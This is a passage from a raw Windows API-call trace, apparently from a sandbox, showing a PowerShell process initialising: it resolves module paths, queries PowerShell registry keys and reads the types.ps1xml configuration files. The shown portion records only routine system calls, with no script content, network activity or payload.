lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.966] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0089.966] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33 [0089.966] CoTaskMemFree (pv=0x2e4450) [0089.968] CoTaskMemAlloc (cb=0xcc) returned 0x2d65b0 [0089.968] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2d65b0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0089.968] CoTaskMemFree (pv=0x2d65b0) [0089.968] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x16db28 | out: phkResult=0x16db28*=0x338) returned 0x0 [0089.968] RegQueryValueExW (in: hKey=0x338, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16daac, lpData=0x0, lpcbData=0x16daa8*=0x0 | out: lpType=0x16daac*=0x2, lpData=0x0, lpcbData=0x16daa8*=0x6c) returned 0x0 [0089.968] CoTaskMemAlloc (cb=0x70) returned 0x281930 [0089.969] RegQueryValueExW (in: hKey=0x338, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16da7c, lpData=0x281930, lpcbData=0x16da78*=0x6c | out: lpType=0x16da7c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x16da78*=0x6c) returned 0x0 [0089.969] CoTaskMemFree (pv=0x281930) [0089.969] CoTaskMemAlloc (cb=0xcc) returned 0x2d65b0 [0089.969] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x2d65b0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb [0089.969] CoTaskMemFree (pv=0x2d65b0) [0089.969] CoTaskMemAlloc (cb=0xcc) returned 0x2d65b0 [0089.969] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2d65b0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0089.969] CoTaskMemFree (pv=0x2d65b0) [0089.973] RegCloseKey (hKey=0x338) returned 0x0 [0089.973] CoTaskMemAlloc (cb=0xcc) returned 0x2d65b0 [0089.973] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2d65b0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0089.973] CoTaskMemFree (pv=0x2d65b0) [0089.974] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x16db28 | out: phkResult=0x16db28*=0x338) returned 0x0 [0089.974] RegQueryValueExW (in: hKey=0x338, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16daac, lpData=0x0, lpcbData=0x16daa8*=0x0 | out: lpType=0x16daac*=0x0, lpData=0x0, lpcbData=0x16daa8*=0x0) returned 0x2 [0089.974] RegCloseKey (hKey=0x338) returned 0x0 [0089.997] CoTaskMemAlloc (cb=0x20c) returned 0x2fbba0 [0089.997] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2fbba0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0089.999] CoTaskMemFree (pv=0x2fbba0) [0089.999] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x16d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0090.001] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1 [0090.018] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0090.018] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.018] CoTaskMemFree (pv=0x2e4450) [0090.020] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0090.020] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.020] CoTaskMemFree (pv=0x2e4450) [0090.029] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0090.029] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.030] CoTaskMemFree (pv=0x2e4450) [0090.030] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0090.030] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.030] CoTaskMemFree (pv=0x2e4450) [0090.035] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d918 | out: phkResult=0x16d918*=0x340) returned 0x0 [0090.038] RegQueryValueExW (in: hKey=0x340, lpValueName="path", lpReserved=0x0, lpType=0x16d92c, lpData=0x0, lpcbData=0x16d928*=0x0 | out: lpType=0x16d92c*=0x1, lpData=0x0, lpcbData=0x16d928*=0x74) returned 0x0 [0090.039] RegQueryValueExW (in: hKey=0x340, lpValueName="path", lpReserved=0x0, lpType=0x16d89c, lpData=0x0, lpcbData=0x16d898*=0x0 | out: lpType=0x16d89c*=0x1, lpData=0x0, lpcbData=0x16d898*=0x74) returned 0x0 [0090.039] CoTaskMemAlloc (cb=0x78) returned 0x281930 [0090.039] RegQueryValueExW (in: hKey=0x340, lpValueName="path", lpReserved=0x0, lpType=0x16d86c, lpData=0x281930, lpcbData=0x16d868*=0x74 | out: lpType=0x16d86c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x16d868*=0x74) returned 0x0 [0090.040] CoTaskMemFree (pv=0x281930) [0090.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x16d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0090.040] SetErrorMode (uMode=0x1) returned 0x1 [0090.040] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x16d7f0 | out: lpFileInformation=0x16d7f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0090.040] SetErrorMode (uMode=0x1) returned 0x1 [0090.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0090.044] SetErrorMode (uMode=0x1) returned 0x1 [0090.044] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d7f0 | out: lpFileInformation=0x16d7f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0090.044] SetErrorMode (uMode=0x1) returned 0x1 [0090.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0090.050] SetErrorMode (uMode=0x1) returned 0x1 [0090.050] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d7f0 | out: lpFileInformation=0x16d7f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0090.050] SetErrorMode (uMode=0x1) returned 0x1 [0090.055] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0090.055] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.055] CoTaskMemFree (pv=0x2e4450) [0090.067] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0090.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.067] CoTaskMemFree (pv=0x2e4450) [0090.068] GetACP () returned 0x4e4 [0090.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0090.077] SetErrorMode (uMode=0x1) returned 0x1 [0090.079] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x344 [0090.079] GetFileType (hFile=0x344) returned 0x1 [0090.079] SetErrorMode (uMode=0x1) returned 0x1 [0090.079] GetFileType (hFile=0x344) returned 0x1 [0090.084] ReadFile (in: hFile=0x344, lpBuffer=0x2eee988, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2eee988*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.087] ReadFile (in: hFile=0x344, lpBuffer=0x2eee988, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2eee988*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.088] ReadFile (in: hFile=0x344, lpBuffer=0x2eee988, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2eee988*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.089] ReadFile (in: hFile=0x344, lpBuffer=0x2eee988, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2eee988*, lpNumberOfBytesRead=0x16d728*=0xcf3, lpOverlapped=0x0) returned 1 [0090.089] ReadFile (in: hFile=0x344, lpBuffer=0x2eedde3, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2eedde3*, lpNumberOfBytesRead=0x16d728*=0x0, lpOverlapped=0x0) returned 1 [0090.089] ReadFile (in: hFile=0x344, lpBuffer=0x2eee988, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2eee988*, lpNumberOfBytesRead=0x16d728*=0x0, lpOverlapped=0x0) returned 1 [0090.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0090.095] SetErrorMode (uMode=0x1) returned 0x1 [0090.095] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d6a0 | out: lpFileInformation=0x16d6a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0090.096] SetErrorMode (uMode=0x1) returned 0x1 [0090.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0090.097] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d788 | out: phkResult=0x16d788*=0x344) returned 0x0 [0090.097] RegQueryValueExW (in: hKey=0x344, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d70c, lpData=0x0, lpcbData=0x16d708*=0x0 | out: lpType=0x16d70c*=0x1, lpData=0x0, lpcbData=0x16d708*=0x56) returned 0x0 [0090.097] CoTaskMemAlloc (cb=0x5a) returned 0x30b8f0 [0090.097] RegQueryValueExW (in: hKey=0x344, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d6dc, lpData=0x30b8f0, lpcbData=0x16d6d8*=0x56 | out: lpType=0x16d6dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d6d8*=0x56) returned 0x0 [0090.097] CoTaskMemFree (pv=0x30b8f0) [0090.097] RegCloseKey (hKey=0x344) returned 0x0 [0090.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0090.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0090.155] GetSystemInfo (in: lpSystemInfo=0x16c3c0 | out: lpSystemInfo=0x16c3c0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0090.156] VirtualQuery (in: lpAddress=0x16c470, lpBuffer=0x16d330, dwLength=0x30 | out: lpBuffer=0x16d330*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0090.185] SetErrorMode (uMode=0x1) returned 0x1 [0090.186] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x344 [0090.186] GetFileType (hFile=0x344) returned 0x1 [0090.186] SetErrorMode (uMode=0x1) returned 0x1 [0090.186] GetFileType (hFile=0x344) returned 0x1 [0090.199] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.200] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.200] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.201] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.201] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.201] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.201] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.201] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.202] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.204] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.204] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.205] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.205] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.206] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.206] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.206] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.207] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.210] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.211] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.211] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.212] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.212] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.212] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.213] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.213] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.214] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.214] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.215] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.215] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.215] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.216] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.216] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.217] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.223] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.223] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, lpNumberOfBytesRead=0x16d728*=0x1000, lpOverlapped=0x0) returned 1 [0090.224] ReadFile (in: hFile=0x344, lpBuffer=0x2db6408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d728, lpOverlapped=0x0 | out: lpBuffer=0x2db6408*, 